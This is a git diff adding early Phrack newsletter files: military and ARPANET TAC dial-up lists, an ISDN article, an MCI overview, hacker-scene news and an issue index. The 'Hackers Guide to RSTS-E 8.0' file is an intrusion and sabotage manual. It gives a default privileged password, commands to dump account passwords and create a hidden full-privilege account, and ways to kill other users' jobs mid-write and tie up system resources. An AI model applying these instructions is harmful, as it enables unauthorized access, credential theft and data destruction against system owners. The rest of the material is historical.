+   (SAC2-MIL-TAC)    (402) 292-4638 (R10)   (402) 292-4638 (R10)         B
+
+   (SAC-ARPA-TAC) [A]
+                     (402) 294-2398         (402) 294-2398               B
+                     (402) 291-2018         (402) 291-2018               B
+                     (402) 292-7054         (402) 292-7054               B
+
+  NEW JERSEY
+   Dover [M]
+   (ARDC-TAC)        (201) 724-6731         (201) 724-6731               B/V
+                     (201) 724-6732         (201) 724-6732               B/V
+                     (201) 724-6733         (201) 724-6733               B/V
+                     (201) 724-6734         (201) 724-6734               B/V
+
+   Fort Monmouth [M]
+   (FTMONMOUTH1-MIL-TAC)   (201) 544-2052         (201) 544-2052         B/V
+                           (201) 544-2062         (201) 544-2062         B/V
+                           (201) 544-2072         (201) 544-2072         B/V
+                           (201) 544-2396         (201) 544-2396         B/V
+                           (201) 544-2430         (201) 544-2430         B/V
+
+   (FTMONMOUTH2-MIL-TAC)   (201) 544-4254 (R3)    (201) 544-2430         B
+                                                  (201) 544-2636         B
+                                                  (201) 544-2638         B
+          (201) 544-2777         B
+
+  NEW MEXICO
+   Albuquerque [M]
+   (AFWL-TAC)        [none known]
+
+  White Sands [M]
+   (WSMR-TAC)       [no dialups; contact NSC for access]
+                    Claude (Skeet) Steffey - (505) 678-1271
+                                             (FTS) 898-1271
+                                              (AV) 258-1271
+
+  NEW YORK
+   Griffiss AFB
+   (RADC-ARPA-TAC) [A] [no dialup capability]
+
+   (RADC-TAC) [M]
+                     (315) 339-4913 (R5)
+                     (315) 337-2004           (315) 337-2004              B/V
+                     (315) 337-2005           (315) 337-2005              B/V
+
+                     (315) 330-2294           (315) 330-2294  (FTS) 952   B/V
+
+                     (315) 330-3587           (315) 330-3587  (FTS) 952   B/V
+
+  NORTH CAROLINA
+   Ft. Bragg [A]
+   (BRAGG-ARPA-TAC)  (919) 396-1131 (R10)     (919) 396-1426  (R5)        B/V
+                                              (919) 396-1491  (R8)        B/V
+   Ft. Bragg [M]
+   (BRAGG-MIL-TAC)   [none known]
+
+  OHIO
+   Wright-Patterson AFB [M]
+   (WPAFB-TAC)       (513) 258-4218
+                     (513) 258-4219
+                     (513) 258-4987
+                     (513) 258-4988
+                     (513) 258-4989
+                     (513) 258-4990
+
+   (WPAFB2-MIL-TAC)  (513) 257-2172 (R8)     (513) 257-2172 (R8)        B
+                     (513) 257-2690 (R8)     (513) 257-2690 (R8)        B
+                     (513) 257-3625 (R8)     (513) 257-3625 (R8)        B
+
+  OKLAHOMA
+   Tinker AFB [M]
+   (TINKER-MIL-TAC)  [none known]
+
+
+  PENNSYLVANIA
+   New Cumberland Army Depot [M]
+   (NCAD-MIL-TAC)    [none known]
+
+   (NCAD2-MIL-TAC)   [none known]
+
+  TEXAS
+   Brooks AFB [M]
+   (BROOKS-AFB-TAC)  (512) 536-3081 (R6)  (512) 536-3081 (R6)              B/V
+
+   Richardson [A]
+   (COLLINS-TAC)     (214) 235-2131       (214) 235-2131                   B
+                     (214) 235-2143       (214) 235-2143                   B
+                     (214) 235-2178       (214) 235-2178                   B
+                     (214) 235-2204       (214) 235-2204                   B
+                     (214) 235-2251       (214) 235-2251                   B
+                     (214) 235-2278       (214) 235-2278                   B
+
+  UTAH
+   Dugway Proving Ground [M]
+   (DUGWAY-MIL-TAC)  [none known]
+
+   Salt Lake City (University of Utah) [A]
+   (UTAH-TAC)        (801) 581-3486       (801) 581-3486                   B/V
+
+  VIRGINIA
+   Alexandria [M]
+   (DARCOM-TAC)      (202) 274-5300       (202) 274-5300                   B
+                     (202) 274-5320 (R6)  (202) 274-5320 (R6)              B
+
+   Arlington
+   (ARPA1-MIL-TAC) [M]   [none known]
+
+   (ARPA2-MIL-TAC) [M]   [none known]
+
+   (ARPA3-TAC) [A]   [no dialup capability]
+
+   Dahlgren [M]
+   (NSWC-TAC)        (703) 663-2162 (R8)     (703) 663-2162 (R8)          B
+
+   Langley Air Force Base [M]
+   (LANGLEY-MIL-TAC) [none known]
+
+   McLean [M]
+   (DDN-PMO-MIL-TAC) [none known]
+
+
+   (MITRE-TAC) [M]
+                     (703) 442-8020 (R15)
+                     (703) 893-0330 (R10)    (703) 893-0330 (R10)         B/V
+
+   Norfolk [M]
+   (NORFOLK-MILTAC)  (804) 423-0241 (R2)     (804) 423-0241 (R2)          B
+                     (804) 423-0247 (R2)     (804) 423-0247 (R2)          B
+                     (804) 423-0346 (R4)     (804) 423-0346 (R4)          B
+                     (804) 423-0480          (804) 423-0480               B
+                     (804) 423-0486 (R2)     (804) 423-0486 (R2)          B
+                     (804) 423-0489          (804) 423-0489               B
+                     (804) 423-0570          (804) 423-0570               B
+                     (804) 423-0572 (R2)     (804) 423-0572 (R2)          B
+                     (804) 423-0577 (R2)     (804) 423-0577 (R2)          B
+                     (804) 423-0651          (804) 423-0651               B
+                     (804) 423-0654 (R3)     (804) 423-0654 (R3)          B
+                     (804) 423-0841 (R2)     (804) 423-0841 (R2)          B
+                     (804) 423-0845          (804) 423-0845               B
+                     (804) 423-0849          (804) 423-0849               B
+                     (804) 423-0858          (804) 423-0858               B
+                     (804) 423-0950          (804) 423-0950               B
+                     (804) 423-0952          (804) 423-0952               B
+                     (804) 423-0955 (R3)     (804) 423-0955 (R3)          B
+                     (804) 423-0959          (804) 423-0959               B
+
+   Reston
+   (DCEC-ARPA-TAC) [A]   [no dialups available]
+
+   (DCEC-MIL-TAC) [M]
+                     (703) 437-2892 (R5)     (703) 437-2928               B
+                     (703) 437-2925          (703) 437-2929               B
+                     (703) 437-2926
+                     (703) 437-2927
+
+  WASHINGTON
+   Seattle [A]
+   (WASHINGTON-TAC)  [no dialup capability]
+
+  ENGLAND [M]
+   (CROUGHTON-MIL-TAC)   [none known]
+
+  GERMANY [M]
+   (FRANKFURT-MIL-TAC)
+                     (M) 2311-5641 (R8)                                   B
+
+   (RAMSTEIN2-MIL-TAC) [none known]
+
+  ITALY [M]
+   (AGNANO-MIL-TAC)
+
+  JAPAN [M]
+   (BUCKNER-MIL-TAC)
+
+   (ZAMA-MIL-TAC)
+
+  KOREA [M]
+   (KOREA-TAC)       (M) 264-4951 (R8)                                    B
+
+  PHILIPPINES [M]
+   (CLARK-MIL-TAC)
+
+  SPAIN [M]
+   (MILNET-TJN-TAC)  [none known]
+
+   (ROTA-MIL-TAC)    [none known]
+
+  Notes:
+
+  1.  "(R10)" following phone number indicates a rotary with 10 lines.
+
+  2.  For alternate phone numbers, FTS=Federal Telephone System.
+  3.  (M)=Military DoD Telephone System.
+
+  4.  [M] denotes a MILNET TAC and [A] denotes an ARPANET TAC.
+
+  5.  "1200 Type" refers to the modem compatibility for 1200 baud only:
+       B/V =  Bell and Vadic
+       B   =  Bell 212A only
+       V   =  Vadic 3400 only
+
+  6.  This list is contained in the file NETINFO:TAC-PHONES.LIST at
+      SRI-NIC.
+
+
+
diff --git a/phrack2/6.txt b/phrack2/6.txt
new file mode 100644
index 0000000..3c3904c
--- /dev/null
+++ b/phrack2/6.txt
@@ -0,0 +1,104 @@
+                                ==Phrack Inc.==
+                     Volume One, Issue Two, Phile 6 of 9
+
+                Toward Universal Information Services Via ISDN
+                ~~~~~~ ~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~ ~~~ ~~~~
+                                 by Taran King
+
+                From PROTO newsletter of AT&T Bell Laboratories
+------------------------------------------------------------------------------
+         Phase one, the Present.
+         ~~~~~ ~~~~ ~~~ ~~~~~~~~
+         The local network of today, although still largely
+         voice-oriented, is already on the path to Universal
+         Information Services.  Lightguide fiber is dramatically
+         expanding the capacity of local networks, helping to lower
+         the costs and increase the demand for high-band width,
+         Information Age services.  And public networks are
+         increasingly digital and geared for data and special
+         services.  For example:
+
+         o The AT&T Network Systems 5ESS (TM <riiiight>) switch,
+         designed by Bell Laboratories, can serve as the hub of a
+         local deployment of remote modules at locations up to 100
+         miles from a host central office.
+
+         o The Integrated Special Services Network (ISSN) is a channel
+         network that provides special services, customer control
+         options and digital private lines rearrangeable under
+         software control.  The ISSN incorporates digital carrier
+         terminating equipment such as the D4 Channel Bank, D5 Digital
+         Terminal System and Digital Access and Cross-connect System
+         (DACS).
+
+         o The New Centrex is bringing greater levels of customer
+         control, improved services and a broad range of data
+         capabilities to the business customer.
+
+                 Today's public networks consist of multiple or
+         overlay networks.  The public switched network, or circuit
+         network, mainly for voice, is the base network.  Two kinds of
+         overlay networks provide special services.  Channel networks
+         carry private lines leased by large customers and transmit
+         much of today's data and image traffic; they also handle
+         traffic for network operations support.  Packet networks
+         carry data communications, while packet switching is used
+         internally to public networks for common channel signaling to
+         set up, route and take down calls, or to give customers
+         information.
+                 "Overlay networks help telecommunications companies
+         efficiently meet growing demand for digital transmission and
+         special services," says Stan Johnston, Market Planning
+         Manager, Network Systems Evolution, in AT&T Network Systems.
+         "Their integration into a single network, however, would be
+         still more effective."
+
+         Phase two, the Integrated Services Digital Network (ISDN).
+         ~~~~~ ~~~~ ~~~ ~~~~~~~~~~ ~~~~~~~~ ~~~~~~~ ~~~~~~~ ~~~~~~~
+         The ISDN is a concept to which AT&T is committed - and it's
+         the foundation for Universal Information Services.  The
+         central idea of ISDN, as AT&T Network Systems sees it, is to
+         provide an individual user a link to the local central office
+         of generous band-width - a digital subscriber line that can
+         carry 144,000 bits per second (sure beats 2400 baud!).  The
+         band-width is subdivided into two 64,000-bit channels, which
+         may carry voice or data or both, and one 16,000-bit channel
+         for packetized signaling information or data transport.  Such
+         a link provides convenient "integrated" network access by
+         accommodating voice, data and signaling over a single line.
+                 The ISDN will make it easier for a customer to get
+         varied services from public and private networks.  More
+         bandwidth for big customers will be available through another
+         ISDN access standard, the extended digital subscriber line,
+         which provides 1.5 billion bits per second as 24 channels of
+         64,000 bits each.
+                 In 1986, new software from Bell Labs will enable the
+         5ESS switch to accommodate ISDN-sized 144,000-bit channels
+         that standardize and simplify subscribers' use of local
+         networks.  AT&T is committed to future products that will
+         also be ISDN-compatible.  Other vendors, too, some of whom
+         already plan to build premises, terminal, and other
+         equipment to ISDN standards, will make ISDN a cooperative
+         effort.
+                 By providing integrated digital access to networks,
+         ISDN will make important progress toward the goal of
+         Universal Information Services.  But overlay networks will
+         continue to divvy up the transport job.  And messages needing
+         less than 144,000 bits per second will not fill their
+         allotted bandwidth, leaving capacity underutilized.
+
+         Phase three, Universal Information Services.
+         ~~~~~ ~~~~~~ ~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~
+         Rooted in the fertile ground of 5ESS switches, ISDN equipment
+         and technologies such as wideband packet transport, Universal
+         Information Services will bear fruit during the 1990s.  From
+         a single kind of network will hang services as different as
+         apples, oranges and pears.  Just as network access was
+         integrated in ISDN, transport functions will increasingly be
+         integrated by powerful new network equipment evolved from
+         equipment developed for the ISDN.  Where customers once got
+         standard-sized ISDN channels, they'll get big bandwidth for
+         large jobs, little bandwitdh for small jobs.
+
+
+
diff --git a/phrack2/7.txt b/phrack2/7.txt
new file mode 100644
index 0000000..688bcd0
--- /dev/null
+++ b/phrack2/7.txt
@@ -0,0 +1,294 @@
+                                ==Phrack Inc.==
+                     Volume One, Issue Two, Phile 7 of 9
+
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+@                                                                             @
+@                             _  _        _______                             @
+@                            | \/ |      / _____/                             @
+@                            |_||_|etal / /hop                                @
+@                            __________/ /                                    @
+@                           /___________/                                     @
+@                      Headquarters of Phrack Newsletter                      @
+@                                                                             @
+@                               (314) 432-0756                                @
+@                                                                             @
+@                              Proudly Presents                               @
+@                                                                             @
+@                                MCI Overview                                 @
+@                                                                             @
+@                             Written on 11/16/85                             @
+@                                                                             @
+@                                     by                                      @
+@                                                                             @
+@                        Knight Lightning & Taran King                        @
+@                                                                             @
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+
+MCI Communications Corporation, headquartered in Washington, D.C., provides a
+full range of domestic and international telecommunications services, including
+voice and data, telex and cable, paging and mobile telephone, and time
+sensitive message delivery.
+
+Since its founding in 1968, MCI has grown to more than $1.6 billion in annual
+sales and serves more than 1.9 million business, residential and government
+customers through its four major business units:
+
+                            MCI Telecommunications
+
+                                 MCI Airsignal
+
+                               MCI International
+
+                       MCI Digital Information Services
+
+
+MCI TELECOMMUNICATIONS
+----------------------
+MCI Telecommunications provides domestic interstate long distance service
+throughout all 50 states, plus Puerto Rico, the U.S. Virgin Islands, and major
+calling areas of Canada.  It is also authorized to provide varying degrees of
+intrastate long distance service in some states.
+
+MCIT also is the first long distance carrier other than AT&T to offer direct
+dial service overseas.  International telephone service is available to all
+residential and commercial customers (with the exception of Private Line
+customers).  In October, 1984 the first international service agreements were
+announced with the following countries:  Argentina, Belgium, Brazil, East
+Germany, Greece, United Arab Emirates, and the United Kingdom.
+
+Total capital investment in MCI's long distance network is approximately $2
+billion.  MCI's network, the second largest in the U.S., employs microwave
+optical fiber, satellite and various digital transmission technologies.
+
+Subscribers - Domestic Long Distance (as of 10/84)
+-----------   ----------------------
+Residential              1.4 million
+Commercial                .3 million
+     Total               1.7 million
+
+Operations - (as of 10/84)
+Network Miles            20,543
+(microwave, optical fiber, satellite)
+
+Circuits                238,000
+Employees                 9,500 (full-time, approx.)
+
+
+MCI AIRSIGNAL
+-------------
+MCI Airsignal provides personal message delivery and car telephone services.
+MCI Message Service is offered in more than 50 metropolitan areas.  In 1984,
+service will commence in New York City, Baltimore-Washington, Los Angeles, and
+Chicago.  MCI car telephone service is offered in 20 markets.
+
+Personal Message Delivery Service
+---------------------------------
+                         ALPHANUMERIC MESSAGE SERVICE
+
+    Displays up to 40-character message using letters and/or numbers.  Memory
+    and recall ability.  Alerts subscriber with a silent visual alert or a soft
+    tone.
+
+                            DISPLAY MESSAGE SERVICE
+
+    Displays up to 24-digit message (e.g., phone number, stock quotes, sales
+    figures, coded messages).  Memory and recall capability.  Alerts customer
+    to message with a silent visual alert or a soft tone.
+
+                             TONE MESSAGE SERVICE
+
+    Notifies customer of a message with a soft tone.
+
+                             VOICE MESSAGE SERVICE
+
+    Receives message in actual voice of caller.
+
+                            EXPRESS MESSAGE SERVICE
+
+    Receives and stores messages.  Instantly alerts subscriber via pager when
+    a message is received.
+
+Car Telephone Service
+---------------------
+Enables customers to place calls to or receive calls from anywhere in the
+world, 24 hours a day, as they travel in their cars.  With the advent of new
+cellular technology, both the quality and the accessibility of car telephone
+service will vastly improve.
+
+MCI has thus far obtained franchises to operate a new kind of mobile phone
+service, cellular telephone, in Minneapolis and Pittsburgh, and has received
+favorable decisions from FCC administration law judges authorizing service in
+Los Angeles, Denver-Boulder, and Kansas City.  MCI has applied for licenses to
+provide cellular service in 81 metropolitan areas.
+
+MCI Airsignal Branch Sales Offices
+----------------------------------
+Personal Message Service/Conventional Mobile Phone Service
+
+            Birmingham                             (205)  942-2924
+            Sacramento                             (916)  444-2350
+            Memphis                                (901)  682-9658
+            Cleveland                              (216)  464-7311
+            Dallas                                 (214)  788-5111
+            Fresno                                 (209)  486-7410
+            Las Vegas                              (702)  382-7461
+            Denver                                 (303)  778-7878
+            Portland                               (503)  227-2556
+            Philadelphia                           (215)  677-9845
+            Atlanta                                (404)  252-2114
+            West Florida                           (813)  875-3404
+            Minneapolis                            (612)  544-8175
+            Kansas City                            (913)  648-8090
+            Miami                                  (305)  491-0122
+            Pittsburgh                             (412)  343-1611
+            Houston                                (713)  464-2516
+            Bakersfield                            (805)  832-2346
+
+Cellular Telephone Offices
+
+            Minneapolis-St. Paul                   (612)  544-3312
+            Los Angeles                            (714)  527-0385
+            Elsewhere in California                (800)  344-3455
+
+            Headquarters - Washington, D.C.        (202)  429-9660
+
+
+MCI INTERNATIONAL
+-----------------
+MCI International provides private-line voice service to several overseas
+countries, and data and message services, including telex, cablegram, leased
+channel, and packet switching communications, to more than 200 overseas points.
+MCI has moved into two new areas of service:  International direct-dial
+telephone service and international electronic mail and hard-copy delivery
+services.
+
+International Record Services
+-----------------------------
+TELEX SERVICE (domestic and international) permits instantaneous, two-way,
+written communications with other subscribers worldwide.  Customers can send
+messages at any time, even though the receiving terminal may be unattended.
+MCI International offers access to its telex service from a variety of
+terminals and networks; not only subscribers with telex terminals but also
+those with communicating word processors, data terminals or computers that
+communicate over telephone lines can take advantage of MCI International telex
+service.  To subscribers connected to its own telex network, MCI International
+offers World Message Services--a package of communications offerings including
+telex, cablegram and MCI Mail services.  Various service enhancements are
+available to save time, improve operating efficiency and simplify records
+keeping for telex users.
+
+CABLEGRAM SERVICE, the traditional means of international written
+communications, offers flexibility in delivery and economical rates for shorter
+messages.  Cablegrams can be delivered to virtually any overseas point.
+Subscribers with telex terminals or various other types of equipment can access
+and TELUS cablegram switch and take advantage of such service enhancements as
+abbreviated addressing and departmental billing.
+
+LEASED CHANNEL SERVICE provides an exclusive line between a U.S. firm and it's
+overseas office for private communications 24 hours a day.  Each MCI
+International leased channel is tailored to meet the needs of a specific
+customer for teleprinter, facsimile, voice and/or data traffic.  For
+subscribers with several offices requiring private communications with each
+other, MCI International offers a versatile message-switching service.
+Voice/data leases can be configured to meet a whole array of communicating
+needs; for example, one channel might carry data traffic from a computer at
+night, voice communications during office hours, and simultaneous teleprinter
+messages at any time.  Data channels can handle requirements for traffic at any
+speed from 1200 bits per second to 1.544 megabits per second.
+
+IMPACS SERVICE uses packet-switching technology to provide international
+communications service between data terminals and computers.  Impacs offers
+on-line, real-time connections and enables many types of incompatible systems
+to communicate.  Impacs service offers virtually error-free transmission
+because of the error-detection and retransmission capability of the network.
+
+INSTALINK SERVICE allows businesses overseas to use regular telex equipment to
+access remote computing systems and databases in the U.S.  Subscribers can
+retrieve data from a computer-based information service or use a computing
+system connecting to a packet-switching network in the U.S.
+
+INTERNATIONAL FACSIMILE SERVICE enables subscribers to send duplicates of
+original documents overseas quickly and efficiently, even when neither the
+sender nor the receiver has facsimile transmission equipment, or when the
+sender and receiver have incompatible equipment.
+
+DATEL SERVICE provides automatic or voice-coordinated data transmission at
+speeds up to 2400 bits per second.  Either digital or analog facsimile traffic
+can be transmitted via Datel.  Datel facilities are conditioned to ensure
+high-quality transmission.  The MCI International switching center allows
+communications between incompatible terminals.
+
+MARITIME SERVICES provide instant, high--quality contact between ships at sea
+or offshore rigs, and between these vessels and land-based subscribers
+worldwide.
+
+International Voice Services
+----------------------------
+PRIVATE LINE SERVICE provides, fast, easy access to a single overseas location
+at an economical monthly rate.  This technically efficient system maximizes the
+use of line capacity by recognizing idle time and assigning a speaker to a
+transmission path only when the path is needed.  Users can dial a four-digit
+extension from a regular business phone to reach a key overseas location.
+
+International Mail Services
+---------------------------
+WORLD MESSAGE SERVICE subscribers can access the domestic electronic mail and
+hard-copy delivery offerings of MCI Mail.  In addition, MCI International is
+developing fast, low-cost services that will deliver electronic messages and
+high-quality printed documents worldwide.
+
+Customer Service
+----------------
+THE CUSTOMER TROUBLE REPORTING ASSISTANCE CENTER at MCI International addresses
+customer concerns such as equipment maintenance and service performance
+questions.  Customer service specialists, on duty 24 hours a day on business
+days, answer questions and electronically route service requests to technicians
+nationwide.
+
+MCI DIGITAL INFORMATION SERVICES CORP.
+--------------------------------------
+MCI Digital Information Services, MCI's newest unit, provides high-speed,
+low-cost, time-sensitive message delivery (MCI Mail), either electronically or
+via hard copy.
+
+MCI Mail provides time-sensitive document delivery to anyone, anywhere vial
+MCI's long-distance telephone network.  MCI Mail can reach a recipient
+instantly, in four hours or less, or overnight by noon the next day.  Prices
+are as much as 90 percent lower than comparable time-sensitive mail delivery
+services.  MCI Mail can be delivered electronically, terminal to terminal, or
+laser printed on letterhead stationery with the customer's signature.
+
+MCI Mail customers can even order gifts and services direct through MCI Mail,
+ranging from software and paper for personal computers to investment advisory
+services to travel specials.
+
+There are no sign-up, monthly service charges or "connect time" charges for MCI
+Mail.  MCI Mail can be used by virtually any personal computer, word processor,
+electronic typewriter, data terminal, telex, or other digital communications
+device.  The service is accessed by a local telephone call or 800 number.
+
+MCI Mail
+--------
+INSTANT delivery to an "electronic" mailbox.
+
+FOUR-HOUR paper delivery by courier to 17 major metropolitan areas regardless
+of point of origin.
+
+OVERNIGHT paper delivery by courier by noon the next day in 20,000 continental
+U.S. cities.
+
+MCI LETTER transmitted electronically to the MCI digital postal center nearest
+its destination, then delivered locally by the U.S. Postal Service.
+
+TELEX DISPATCH enables MCI Mail subscribers to transmit messages to the more
+than 1.6 million telex subscribers worldwide.
+
+VOLUME MAIL enables customers to send large mailings in a variety of letter
+formats, at substantial savings in delivery time and expense.
+
+===============================================================================
+Look for more MCI Files coming to Metal Shop soon!
+
+                 This has been a Knight Lightning Presentation
+
+
diff --git a/phrack2/8.txt b/phrack2/8.txt
new file mode 100644
index 0000000..e6a668a
--- /dev/null
+++ b/phrack2/8.txt
@@ -0,0 +1,70 @@
+                                ==Phrack Inc.==
+                     Volume One, Issue Two, Phile 8 of 9
+
+
+                     The Hackers Guide to RSTS-E 8.0
+
+                       Data Line.  TWX 650-240-6356
+
+
+            Rsts is one of the most versatile operating systems available for
+the PDP-11 series of computers.  It can emulate both RSX and RT-11 (though not
+fully), and is often a choice where multiple concurrent operating systems must
+be online.  I was a system manager on an 11-23 for about a year and learned a
+fair amount about the OS (perhaps forgetting a good deal in the interim).  This
+phile applies to release 8.0 and the entire 7 series.  By the way, version 9.0
+is it - DEC is discontinuing RSTS with that release and using 9.0 as a bridge
+to VMS for the PDP-11 series.  The logon will tell which version you are
+hacking.
+
+        If the SYSTAT-before-logon has been disabled (It probably has), no big
+worry.  Account 1,2 must be present on the system and contains most of the
+system utilities.  On booting, the account is called at least 8 times to put
+batch processors and spoolers online.  Changing [1,2]'s passwords in the
+command file is a tedious process - most system managers are too lazy, so it
+won't change often.  Oh yes, the default PW for 1,2 is SYSLIB.  This knowledge
+should cut hacking time considerably for many systems. When you get in, RUN
+$MONEY.  This gives all accounts, KCT's (Billing units), accesses, time on
+system, and PASSWORDS, if you ask.  Don't reset the system when it asks, it
+merely zeroes the program and not the hardware, but could tip someone off that
+he system had been hacked.
+
+           Personally, I like running out of a new account, so RUN $REACT.
+Pick a new account , making sure the first number (before the comma) is a "1"
+to get full privilege.  Accept defaults for disk placement.  As for Cluster
+size, I prefer 4.  It's large enough to get fast disk access, but small enough
+so that little space is wasted for small files.  Cluster size is shown (CLU or
+CLS) on MONEY and on DIR/FULL.  Follow conventions and you'll stand less chance
+of being noticed.
+
+        RSTS has some of the most complete HELP files short of a CDC mainframe.
+HELP HELP will give the forst screen of the nested menus.  Be sure to do this
+from a privileged account or you'll miss about half of the best commands. HELP
+SYSTAT will give a thorough overview of the system setup & status program.
+
+              RUN $SYSTAT (or just SYS if the Concise Command Language is set
+up normally).  On the left is a report of te system users including all
+background jobs (print spoolers, batch processors and the like), their
+keyboard, and what state they are in (RN=run, ^C=waiting for input, DCL=logged
+on, no program running, DR=Disk Read, DW=Disk Write).  To the right is a list
+of busy I/O devices.  At the end is a full report of Disk names (DR:=Hard, DU:=
+floppy), and space allocated/free.  To cause some havoc pick a target KB,
+preferrably one running a financial type program.  Note the Job 
+leftmost column.  Simply type UT KILL  and he's totally gone, without so much
+as a logoff message.  If done during a Disk Write - get out the backups!!
+
+        If just tying up resources is more your game, RUN $VT50PY.  It gives
+the utilization readout on a 20 second basis, or whenever a key is struck.  The
+program itself uses a lot of CPU time, so when the Interval <20>? comes up,
+enter a 1 and watch the EXEC percent go through the roof.
+
+        If wasting paper is more your style, find the KB: number of the printer
+(KB0: is the console) from SYSTAT when it's in use, or try LP1:.  Find a long
+text file (DIR [*,*]*.txt) and COPY LP1:=filename.  Don't forget the colon when
+referring to keyboards or printers.
+
+        Try DTR.  If DATATRIEVE is online, you can set up a database of huge
+proportions.  Again, full help is available.  SET GUIDE (configure your
+terminal for VT-100) and it takes you through every step.
+
+
diff --git a/phrack2/9.txt b/phrack2/9.txt
new file mode 100644
index 0000000..e867d33
--- /dev/null
+++ b/phrack2/9.txt
@@ -0,0 +1,109 @@
+                                ==Phrack Inc.==
+                     Volume One, Issue Two, Phile 9 of 9
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+                               Phreak World News
+                                  Compiled by
+                      \\\\\=-{ Knight Lightning }-=/////
+_______________________________________________________________________________
+
+Spitfire Hacker Leaves Phreak World
+-----------------------------------
+
+Spitfire Hacker resigned from the phreaking world in December due to a lack of
+computer.  He now is holding a job and trying to earn enough money to get
+another computer.  He says that he plans to be back by November 1986.
+_______________________________________________________________________________
+
+MCI Cracks Down
+---------------
+
+Dr. Crash busted for MCI scanning.  In the early part of December, Dr. Crash
+ran a scanner on MCI, MCI traced him and told him to stop, unfortunately Dr.
+Hack, another 314er, started scanning the same port later that night.  MCI
+didn't trace it again and assumed it was Dr. Crash back at work.  All of his
+files were hidden away but MCI and authorities confiscated his Atari computer
+and his phone.  MCI security told Dr. Crash that he was part of an ongoing
+investigation.  Later that month he had a meeting with MCI security, where they
+questioned him about the incident.  His computer, they told him, will arrive in
+the mail soon.
+_______________________________________________________________________________
+
+Also in this issues news, Jester Sluggo said his goodbyes to St.Louis and now
+has returned to his home in Cross-Bar Territory.
+_______________________________________________________________________________
+
+Announcing...                    _  _        ________
+                                | \/ |      / ______/
+                                |_||_|etal / /hop
+                                __________/ /
+                               /___________/  AE
+                       300/1200/2400 Baud/20 Megs Online
+                         24 hours a day/7 days a week
+                              Sysop: Cheap Shades
+                                (314) 256-7284
+
+If you would like to become a member of this board please contact Cheap Shades,
+Knight Lightning, or Taran King for the general password.
+_______________________________________________________________________________
+
+Metal Shop...PRIVATE
+--------------------
+Metal Shop is now officially a private BBS.  On Jan. 2 Taran King and Knight
+Lightning purged 241 users from the Metal Shop userlist.  There are now general
+passwords and new user passwords to this system.  If you would like to become a
+member of Metal Shop, please contact Taran King, Knight Lightning, or Cheap
+Shades on any bbs they are on.
+_______________________________________________________________________________
+
+Extasyy Elite Disbanded
+-----------------------
+
+The following data has not been completely researched and may be considered as
+rumors. Bit Blitz busted for phreaking, the organization and enforcement
+agencies are unknown. However, $3000 worth of computer material (7 computers)
+were confiscated.  Also it is reported that The Mentor informed on him.
+
+The Mentor was busted for breaking into his school to steal 29 computers. Also
+it has been said that Poltergeist is in the hospital with leukemia.
+It is unknown if any other members were busted for any other reasons. However,
+all former members are apparently safe now.
+
+The Bit Blitz and Crustaceo Mutoid are supposedly forming a new group called
+Rising Force and The Mentor is starting an elite hacking group.
+
+     Much of this information has been supplied by former Extasyy member:
+
+                                Kleptic Wizard
+_______________________________________________________________________________
+
+Legion of Doom Vs. Stronghold East Elite
+----------------------------------------
+Somehow The Maelstrom found the secret LOD VMS in 305, and decided to post
+about it on Stronghold East.  Knight Lightning spoke with Compu-Phreak of the
+LOD, and he said that he told Slave Driver, co-sysop of Stronghold East, to
+remove all posts concerning the LOD VMS, and the LOD itself.  He also
+threatened that failure to do so would bring down the wrath of the 6 most
+active members of the LOD.
+
+When last looked at Stronghold East still had the information online.
+
+The LOD VMS has 96 megs online and store information in a way similar to
+laserdisc.
+
+All readers are encouraged NOT to call it as Compu-Phreak is getting pissed
+and you don't have the passwords anyway.
+_______________________________________________________________________________
+
+Dartmouth Abandoned
+-------------------
+With the destruction of the 58107s 12-27-65 password to the Dartmouth system,
+it seems to have been abandoned by phreaks.  This is good because basically it
+only causes trouble.  Many users get impersonated on that system and false
+rumors are constantly being started.  The best way to have a conference is a
+tele-conference...start one today!
+_______________________________________________________________________________
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
diff --git a/phrack20/1.txt b/phrack20/1.txt
new file mode 100644
index 0000000..c740315
--- /dev/null
+++ b/phrack20/1.txt
@@ -0,0 +1,49 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 20, File 1 of 12
+
+
+                     Phrack Inc. Newsletter Issue XX Index
+                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+     Welcome to Phrack XX, the end of the old and beginning of the new.  The
+original hard luck heroes are back from retirement (or are they?).  Originally,
+this was going to be an issue put out by Crimson Death to show what the end of
+Metal Shop Private was all about as well as to end the association of Metal
+Shop with Phrack Inc., but things just didn't seem to quite happen that way.
+As of today, October 12, 1988, Knight Lightning and Taran King are once again
+the chief editors of Phrack Inc. with the help of Epsilon and The Prophet.
+     This particular issue is dedicated to Metal Shop Private.  Most of the
+files, with the exception of this Index, the Phrack Pro-Phile on Taran King,
+the Timeline, and Phrack World News XX, all files contain the contents of Metal
+Shop Private as of the day it went down with a few exceptions.  Because of the
+"Days until deletion" function, many of the messages were lost when we ran the
+board again.  Most, if not all, subboards were filled close to the 100 message
+mark.  We apologize for not being clever enough to predict the results of
+running the program after such a long time, but you should get a good idea of
+what went on within the domain of Metal Shop Private.  We hope you enjoy it,
+and be watching soon for Phrack XXI.  Good to be back!
+
+                                      Taran King and Knight Lightning
+
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+This issue contains the following files;
+
+1.  Phrack XX Index by Taran King and Knight Lightning
+2.  Phrack Pro-Phile XX on Taran King
+3.  Timeline Featuring Taran King, Knight Lightning, and Cheap Shades
+4.  Welcome To Metal Shop Private by TK, KL, and CS
+5.  Metal/General Discussion
+6.  Phrack Inc./Gossip
+7.  Phreak/Hack Sub
+8.  Social Engineering
+9.  New Users
+10. The Royal Court
+11. Acronyms
+12. Phrack World News XX Featuring SummerCon '88
